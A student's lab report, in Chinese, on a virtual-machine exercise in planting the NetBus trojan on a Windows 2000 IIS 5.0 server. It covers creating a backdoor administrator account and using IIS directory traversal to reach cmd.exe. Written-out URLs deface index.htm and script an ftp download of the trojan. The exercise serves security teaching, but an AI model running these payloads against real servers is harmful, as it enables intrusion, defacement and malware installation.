一、实验目的
1.深刻认识木马的危害性;
2.理解黑客的攻击方法。
二、实验内容
任务一:木马使用
任务二:木马上传
三、实验环境
虚拟机VMware Workstation 16 Pro
虚拟系统文件 win2000 server (IIS5.0)
ftp服务器(Serv-U 9.1.0.5.rar)
netbus.rar
telnet.exe
四、实验步骤
任务准备:
1.桥接模式
2.设置IP地址
3.互相ping通
成功ping通。
4.设置C盘权限
任务一:木马使用
1.木马基本使用
1.1将patch.exe拷贝到靶机
使用U盘传输
1.2运行patch.exe
1.3NetBus木马的一般使用
链接
Cmd中发文本信息
文本框发信息
发送文件
发送成功
启动应用程序
启动成功
- 利用 NetBus.exe 在靶机建立后门。
2.1 在靶机尝试利用 net 命令建立管理员账户
2.2用批处理方式建立管理员账户
设置文件夹选项,显示扩展名
新建txt,写好内容
修改为bat后缀,运行,运行成功
2.3用木马启动bat文件
输入路径,启动程序
一闪而过后启动成功
- telnet 命令使用。
telnet 服务器
用户名密码方式
登入成功
任务二:木马上传
1.确认IIS版本,并访问IIS网页
3.在攻击机配置Serv-U并尝试访问FTP服务器
- (在靶机)采用 ftp 命令方式下载 patch.exe。
下载到这里
- 建立简单网页 index.htm。
页面内容如下
- 远程访问 cmd.exe。
将他放到wwwroot下
在浏览器中这样访问
设置权限
远程访问,看看dir
- 拷贝 cmd.exe
拷贝后如下
用拷贝后的lwq.exe访问
- 黑掉网页 index.htm。
先用此方式
http://10.39.143.159/scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+echo+%20HaHaThisismyhack%20+>c:/inetpub/wwwroot/index.htm
发现如教程所说会HTTP 500出错误
用修改后的命令
http://10.39.132.4/scripts/lwq.exe?/c+echo+Hacked+by+lwq+>>+c:\inetpub\wwwroot\index.htm
出现了CGI错误,正常
再看看原网页,发现修改成功
- 远程执行 ftp 命令。
http://10.39.132.4/scripts/lwq.exe?/c+echo+open+10.39.132.4>+ftp.txt
http://10.39.132.4/scripts/lwq.exe?/c+echo+aa>>+ftp.txt
http://10.39.132.4/scripts/lwq.exe?/c+echo+123>>+ftp.txt
http://10.39.132.4/scripts/lwq.exe?/c+echo+get patch.exe>>+ftp.txt
http://10.39.132.4/scripts/lwq.exe?/c+echo+quit>>+ftp.txt
成功执行,内容就是我们新添加的
五、问题及解决方法
在任务一的1.3中,上传文件时若选择本机桌面上的文件会上传失败
解决方法,选择非桌面的文件进行上传
在2.3 在攻击方利用木马,启动项目没反应,实际上是成功启动了,只不过一闪而过就是说明执行成功。
在1. 确认 IIS 的版本,并访问 IIS 网页。 ,一开始找不到,后面发现既可以在开始菜单找到,又可以win+r找到。
6. 远程访问 cmd.exe。
7. 拷贝 cmd.exe。
8. 黑掉网页 index.htm
这三点比较难,做了很久才搞清楚怎么做的。
六、实验总结
学到了很多,比如远程的木马攻击是怎么实现的,以及黑客是怎么入侵网页的。在生活中,不要点击不明应用程序,特别是邮件发来的,很有可能是钓鱼邮件。还要注意自己文件的权限,要有限度,不要谁都能改,不然很容易被入侵。最重要的,是培养好网安意识,并开启杀软等工具,能有效避免黑客入侵、木马种植等。